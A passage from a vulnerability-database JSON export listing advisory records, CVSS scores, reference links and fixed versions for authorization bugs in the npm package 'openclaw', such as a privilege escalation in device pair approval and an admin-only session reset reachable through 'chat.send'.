                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-missing-caller-scope-validation-in-device-pair-approval",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:39Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-missing-caller-scope-validation-in-device-pair-approval"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-hc5h-pmr3-3497",
                    "reference_id": "GHSA-hc5h-pmr3-3497",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-hc5h-pmr3-3497"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "CVE-2026-33579",
                "GHSA-hc5h-pmr3-3497"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-k52b-966p-ybbk"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90034?format=api",
            "vulnerability_id": "VCID-k5da-7tht-w3bs",
            "summary": "OpenClaw Gateway `operator.write` can reach admin-only session reset via `chat.send` `/reset`\n## Summary\n\nThe `chat.send` path reused command authorization to trigger `/reset` session rotation even though direct session reset is an admin-only control-plane operation.\n\n## Impact\n\nA write-scoped gateway caller could rotate a target session, archive the prior transcript state, and force a new session id without admin scope.\n\n## Affected Component\n\n`src/gateway/server-methods/chat.ts, src/auto-reply/reply/session.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `be00fcfccb` (`Gateway: align chat.send reset scope checks`).",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/be00fcfccba108f88dc3d4380146c6e058770b03",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/be00fcfccba108f88dc3d4380146c6e058770b03"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.28",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.28"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5r8f-96gm-5j6g",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5r8f-96gm-5j6g"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-5r8f-96gm-5j6g",
                    "reference_id": "GHSA-5r8f-96gm-5j6g",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-5r8f-96gm-5j6g"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "GHSA-5r8f-96gm-5j6g"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-k5da-7tht-w3bs"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89025?format=api",
            "vulnerability_id": "VCID-k8s8-zjv4-gqdb",
            "summary": "OpenClaw: Paired-device pairing actions were not limited to the caller device\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nA paired device session with limited pairing scope could enumerate global pairing state and act on pairing requests that belonged to another device within the same gateway scope ceiling.\n\nThis is a same-gateway paired-device authorization bug, not a remote unauthenticated issue. Severity is low.\n\n## Fix\n\nPairing management actions are now limited to the caller device, so non-admin paired-device sessions cannot approve or operate on unrelated pending device requests.\n\nFix commit:\n\n- `5a12f30441d5b0b151f550daa2c5c9e8db61e2e6`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/5a12f30441d5b0b151f550daa2c5c9e8db61e2e6",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
